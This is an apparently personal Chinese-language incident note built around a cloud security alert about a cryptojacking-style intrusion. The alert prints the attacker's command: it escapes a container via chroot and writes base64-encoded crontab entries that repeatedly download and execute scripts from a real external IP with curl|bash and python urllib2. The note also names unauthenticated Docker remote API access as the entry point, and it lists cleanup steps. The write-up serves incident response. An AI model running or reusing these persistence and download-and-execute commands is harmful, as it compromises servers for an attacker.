可疑编码命令 可疑

发生时间:2024-12-06 23:04:56
IP:8.138.181.*** 172.30.154.***

告警描述:检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。

异常事件详情
数据来源: 进程启动触发检测

告警原因:该命令行存在高度可疑的编码特征。

用户名:root

命令行:chroot /mnt/ /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y –reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/crontab && echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab

进程路径:/bin/busybox

进程ID:24609

父进程文件路径:/usr/bin/runc

父进程ID:24608

进程链:

-[847] /usr/bin/containerd
-[24580] /usr/bin/containerd-shim-runc-v2 -namespace moby -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a start
-[24588] /usr/bin/containerd-shim-runc-v2 -namespace moby -id 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a -address /run/containerd/containerd.sock
-[24598] runc –root /var/run/docker/runtime-runc/moby –log /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a/log.json –log-format json –systemd-cgroup create –bundle /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a –pid-file /run/containerd/io.containerd.runtime.v2.task/moby/95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a/init.pid 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
-[24605] runc init
-[24608] runc init
-[24609] chroot /mnt/ /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y –reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/crontab && echo KiAqICogKiAqIHJvb3QgY3VybCBodHRwOi8vMjA1LjE4NS4xMTguMjQ2L2IyZjYyOC9jcm9uYi5zaHxiYXNoCg==|base64 -d >/etc/cron.d/zzh && echo KiAqICogKiAqIHJvb3QgcHl0aG9uIC1jICJpbXBvcnQgdXJsbGliMjsgcHJpbnQgdXJsbGliMi51cmxvcGVuKCdodHRwOi8va2lcXHNcXHMuYS1kXFxvZy50XFxvXHAvdC5zaCcpLnJlYWQoKSIgPi4xO2NobW9kICt4IC4xOy4vLjEK|base64 -d >>/etc/crontab

容器名:tender_dewdney

容器ID:95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a

镜像ID:alpine@sha256:21a3deaa0d32a8057914f36584b5288d2e5ecc984380bc0118285c70fa8c9300

镜像名:alpine:latest

容器hostname:95492a8692a0

容器视角进程路径:/proc/24609/root/bin/busybox

提示:该进程的命令行参数中存在编码,并且解码后的内容可疑

描述:该进程的命令行参数中存在编码,并且解码后的内容可疑。攻击者在植入恶意代码时,有可能会先进行编码。

处置建议:

首先验证告警的准确性。根据告警中的IOC(例如命令行,文件路径、网络等)结合机器上的异常行为或其他告警,判断告警是否为误报。如果是则忽略或加白该告警;如果不是则及时进行处置,避免恶意行为产生进一步的影响。
调查告警的产生根因。根据告警详情或其他告警的事件说明,还原机器被入侵的原因,修复相关漏洞或清理相关后门,防止攻击者的二次入侵。
事件说明

检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。

命令行
curl http://205.185.118.246/b2f628/cronb.sh
进程PID
24694
进程文件名
curl
父进程ID
24690
父进程路径
dash
父进程文件路径
/usr/bin/dash
进程链
-[777] /usr/sbin/cron -f -P

-[24685]  /usr/sbin/cron -f -P

    -[24690]  /bin/sh -c curl http://205.185.118.246/b2f628/cronb.sh|bash

处理方案

  1. 查看相关docker容器,进行docker stop和docker rm
    docker stop 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
    docker rm 95492a8692a0d66fa93c4709f06d7bfd7f7f1237a5a622b5f18b8d11fb4c551a
  2. 删除相关image镜像
    docker image rm alpine:latest
  3. 手动检查并清理以下文件中的恶意代码,删除有关205.185.118.246的定时任务。
    sudo nano /etc/crontab
    sudo nano /etc/cron.d/zzh
  4. 打开防火墙并把ip加入黑名单:
    sudo ufw status verbose如果返回 Status: inactive,说明防火墙未启用。
    sudo ufw enable
    sudo ufw deny from 205.185.118.246
  5. 关闭docker远程,之前是因为配置不了docker-compose才用,现在解决了所以也不用docker远程了,并且关闭云服务器相关端口入站规则。
  6. reboot重启服务器
  7. ps -aux看还有无相关的进程。

处理后暂时没有发现相关进程就先不管了,有问题以后再看。
入侵原理类似该文章,采用docker远程api未授权访问逃逸,docker远程访问端口要保护好。